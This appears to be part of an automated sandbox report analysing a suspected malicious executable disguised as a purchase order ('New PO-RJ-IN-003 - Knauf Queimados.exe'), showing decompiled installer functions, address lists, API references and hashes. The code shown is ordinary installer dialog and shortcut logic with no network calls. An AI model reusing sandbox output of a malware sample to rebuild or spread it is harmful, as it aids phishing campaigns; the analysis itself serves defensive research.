                                                                                                                          0x00404a33
                                                                                                                          0x00404a39
                                                                                                                          0x00404a3b
                                                                                                                          0x00404a3e
                                                                                                                          0x00404a43
                                                                                                                          0x00404a48
                                                                                                                          0x00404a4a
                                                                                                                          0x00404a4a
                                                                                                                          0x00404a6a
                                                                                                                          0x00404a6a
                                                                                                                          0x00404a6c
                                                                                                                          0x00404a6d
                                                                                                                          0x00404a72
                                                                                                                          0x00404a75
                                                                                                                          0x00404a78
                                                                                                                          0x00404a7c
                                                                                                                          0x00404a81
                                                                                                                          0x00404a86
                                                                                                                          0x00404a8a
                                                                                                                          0x00404a8f
                                                                                                                          0x00404a94
                                                                                                                          0x00404a96
                                                                                                                          0x00404a9e
                                                                                                                          0x00404b68
                                                                                                                          0x00404b7b
                                                                                                                          0x00000000
                                                                                                                          0x00404aa4
                                                                                                                          0x00404aa7
                                                                                                                          0x00404aaa
                                                                                                                          0x00404aad
                                                                                                                          0x00404aad
                                                                                                                          0x00404ab3
                                                                                                                          0x00404ab9
                                                                                                                          0x00404abc
                                                                                                                          0x00404ac2
                                                                                                                          0x00404ac3
                                                                                                                          0x00404ac8
                                                                                                                          0x00404ad1
                                                                                                                          0x00404ad8
                                                                                                                          0x00404adb
                                                                                                                          0x00404ade
                                                                                                                          0x00404ae1
                                                                                                                          0x00404b1d
                                                                                                                          0x00404b46
                                                                                                                          0x00404b1f
                                                                                                                          0x00404b2c
                                                                                                                          0x00404b2c
                                                                                                                          0x00404ae3
                                                                                                                          0x00404ae6
                                                                                                                          0x00404af5
                                                                                                                          0x00404aff
                                                                                                                          0x00404b07
                                                                                                                          0x00404b0e
                                                                                                                          0x00404b16
                                                                                                                          0x00404b16
                                                                                                                          0x00404ae1
                                                                                                                          0x00404b4c
                                                                                                                          0x00404b4d
                                                                                                                          0x00404b59
                                                                                                                          0x00404b59
                                                                                                                          0x00404b66
                                                                                                                          0x00404b81
                                                                                                                          0x00404b85
                                                                                                                          0x00404ba2
                                                                                                                          0x00404ba7
                                                                                                                          0x00404baa
                                                                                                                          0x00000000
                                                                                                                          0x00404b87
                                                                                                                          0x00404b8c
                                                                                                                          0x00404b95
                                                                                                                          0x00404f22
                                                                                                                          0x00404f34
                                                                                                                          0x00404f34
                                                                                                                          0x00404b85
                                                                                                                          0x00000000
                                                                                                                          0x00404b66
                                                                                                                          0x00404a9e

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 0040494D
                                                                                                                          • GetDlgItem.USER32 ref: 0040495A
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
                                                                                                                          • LoadBitmapA.USER32 ref: 004049B9
                                                                                                                          • SetWindowLongA.USER32 ref: 004049D3
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
                                                                                                                          • DeleteObject.GDI32(?), ref: 00404A33
                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
                                                                                                                          • GetWindowLongA.USER32 ref: 00404B6D
                                                                                                                          • SetWindowLongA.USER32 ref: 00404B7B
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404B8C
                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D68
                                                                                                                          • GlobalFree.KERNEL32 ref: 00404D78
                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
                                                                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F0E
                                                                                                                          • GetDlgItem.USER32 ref: 00404F19
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F20
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                                                                                          • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                                                                                                                          • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                                                                                          • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































                                                                                                                          0x004043f5
                                                                                                                          0x004043fb
                                                                                                                          0x00404401
                                                                                                                          0x0040440e
                                                                                                                          0x0040441c
                                                                                                                          0x0040441f
                                                                                                                          0x00404427
                                                                                                                          0x0040442d
                                                                                                                          0x0040442d
                                                                                                                          0x00404439
                                                                                                                          0x0040443c
                                                                                                                          0x004044aa
                                                                                                                          0x004044b1
                                                                                                                          0x00404588
                                                                                                                          0x0040458f
                                                                                                                          0x0040459e
                                                                                                                          0x0040459e
                                                                                                                          0x004045a2
                                                                                                                          0x004045ac
                                                                                                                          0x004045b9
                                                                                                                          0x004045bb
                                                                                                                          0x004045bb
                                                                                                                          0x004045c9
                                                                                                                          0x004045d0
                                                                                                                          0x004045d7
                                                                                                                          0x004045da
                                                                                                                          0x00404611
                                                                                                                          0x00404613
                                                                                                                          0x00404619
                                                                                                                          0x0040461e
                                                                                                                          0x00404622
                                                                                                                          0x00404624
                                                                                                                          0x00404624
                                                                                                                          0x00404640
                                                                                                                          0x00000000
                                                                                                                          0x00404642
                                                                                                                          0x00404645
                                                                                                                          0x00404653
                                                                                                                          0x00404659
                                                                                                                          0x0040465a
                                                                                                                          0x0040465d
                                                                                                                          0x00404660
                                                                                                                          0x00000000
                                                                                                                          0x00404660
                                                                                                                          0x004045dc
                                                                                                                          0x004045de
                                                                                                                          0x004045e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004045e4
                                                                                                                          0x004045e4
                                                                                                                          0x004045f1
                                                                                                                          0x004045f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004045fa
                                                                                                                          0x004045fc
                                                                                                                          0x004045fc
                                                                                                                          0x00404607
                                                                                                                          0x0040460a
                                                                                                                          0x0040460f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040460f
                                                                                                                          0x0040466c
                                                                                                                          0x00404676
                                                                                                                          0x00404679
                                                                                                                          0x0040467c
                                                                                                                          0x00404683
                                                                                                                          0x00404683
                                                                                                                          0x00404685
                                                                                                                          0x00404685
                                                                                                                          0x0040468a
                                                                                                                          0x0040468c
                                                                                                                          0x00404694
                                                                                                                          0x0040469b
                                                                                                                          0x0040469d
                                                                                                                          0x004046a8
                                                                                                                          0x004046a8
                                                                                                                          0x0040469d
                                                                                                                          0x004046b8
                                                                                                                          0x004046c2
                                                                                                                          0x004046ca
                                                                                                                          0x004046e5
                                                                                                                          0x004046cc
                                                                                                                          0x004046d5
                                                                                                                          0x004046d5
                                                                                                                          0x004046ca
                                                                                                                          0x004046ea
                                                                                                                          0x004046ef
                                                                                                                          0x004046f4
                                                                                                                          0x004046fd
                                                                                                                          0x004046fd
                                                                                                                          0x00404706
                                                                                                                          0x00404708
                                                                                                                          0x00404708
                                                                                                                          0x00404714
                                                                                                                          0x0040471c
                                                                                                                          0x00404726
                                                                                                                          0x00404726
                                                                                                                          0x0040472b
                                                                                                                          0x00000000
                                                                                                                          0x0040472b
                                                                                                                          0x004045da
                                                                                                                          0x00404591
                                                                                                                          0x00404598
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404598
                                                                                                                          0x004044b7
                                                                                                                          0x004044c0
                                                                                                                          0x004044da
                                                                                                                          0x004044df
                                                                                                                          0x004044e9
                                                                                                                          0x004044f0
                                                                                                                          0x004044fc
                                                                                                                          0x004044ff
                                                                                                                          0x00404502
                                                                                                                          0x00404509
                                                                                                                          0x00404511
                                                                                                                          0x00404514
                                                                                                                          0x00404518
                                                                                                                          0x0040451f
                                                                                                                          0x00404527
                                                                                                                          0x00404581
                                                                                                                          0x00404529
                                                                                                                          0x0040452a
                                                                                                                          0x00404531
                                                                                                                          0x0040453b
                                                                                                                          0x00404543
                                                                                                                          0x00404550
                                                                                                                          0x00404564
                                                                                                                          0x00404568
                                                                                                                          0x00404568
                                                                                                                          0x00404564
                                                                                                                          0x0040456d
                                                                                                                          0x0040457a
                                                                                                                          0x0040457a
                                                                                                                          0x00404527
                                                                                                                          0x00000000
                                                                                                                          0x004044df
                                                                                                                          0x004044cd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004044d3
                                                                                                                          0x00000000
                                                                                                                          0x0040443e
                                                                                                                          0x0040444b
                                                                                                                          0x00404454
                                                                                                                          0x00404461
                                                                                                                          0x00404461
                                                                                                                          0x00404468
                                                                                                                          0x0040446e
                                                                                                                          0x00404477
                                                                                                                          0x0040447a
                                                                                                                          0x0040447d
                                                                                                                          0x00404485
                                                                                                                          0x00404488
                                                                                                                          0x0040448b
                                                                                                                          0x00404491
                                                                                                                          0x00404498
                                                                                                                          0x0040449f
                                                                                                                          0x00404731
                                                                                                                          0x00404743
                                                                                                                          0x004044a5
                                                                                                                          0x004044a8
                                                                                                                          0x00000000
                                                                                                                          0x004044a8
                                                                                                                          0x0040449f

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404444
                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                                                                                                                          • lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
                                                                                                                          • lstrcatA.KERNEL32(?,00422F20), ref: 00404568
                                                                                                                          • SetDlgItemTextA.USER32 ref: 0040457A
                                                                                                                            • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                                                                                                                            • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                                                                                            • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                                                                                            • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                                                                                            • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                                                                                                                            • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                                                                                            • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                                                                                                                            • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: /B$A$C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 2624150263-3312331311
                                                                                                                          • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                                                                                          • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                                                                                                                          • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                                                                                          • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
				_t96 = E00402A0C(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
				if(E0040585B(_t96) == 0) {
					E00402A0C(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                          0x0040203f
                                                                                                                          0x00402049
                                                                                                                          0x00402052
                                                                                                                          0x0040205c
                                                                                                                          0x00402065
                                                                                                                          0x0040206f
                                                                                                                          0x00402073
                                                                                                                          0x00402073
                                                                                                                          0x00402078
                                                                                                                          0x00402089
                                                                                                                          0x00402091
                                                                                                                          0x00402171
                                                                                                                          0x00402171
                                                                                                                          0x00402178
                                                                                                                          0x00402097
                                                                                                                          0x00402097
                                                                                                                          0x004020a8
                                                                                                                          0x004020ac
                                                                                                                          0x004020b2
                                                                                                                          0x004020bc
                                                                                                                          0x004020be
                                                                                                                          0x004020c9
                                                                                                                          0x004020cc
                                                                                                                          0x004020d9
                                                                                                                          0x004020db
                                                                                                                          0x004020dd
                                                                                                                          0x004020e4
                                                                                                                          0x004020e7
                                                                                                                          0x004020e7
                                                                                                                          0x004020ea
                                                                                                                          0x004020f4
                                                                                                                          0x004020fc
                                                                                                                          0x00402101
                                                                                                                          0x0040210d
                                                                                                                          0x0040210d
                                                                                                                          0x00402110
                                                                                                                          0x00402119
                                                                                                                          0x0040211c
                                                                                                                          0x00402125
                                                                                                                          0x0040212a
                                                                                                                          0x0040213c
                                                                                                                          0x0040214b
                                                                                                                          0x0040214d
                                                                                                                          0x00402159
                                                                                                                          0x00402159
                                                                                                                          0x0040214b
                                                                                                                          0x0040215b
                                                                                                                          0x00402161
                                                                                                                          0x00402161
                                                                                                                          0x00402164
                                                                                                                          0x0040216a
                                                                                                                          0x0040216f
                                                                                                                          0x00402184
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040216f
                                                                                                                          0x0040217a
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 123533781-1943935188
                                                                                                                          • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                                                                                          • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                                                                                                                          • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                                                                                          • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

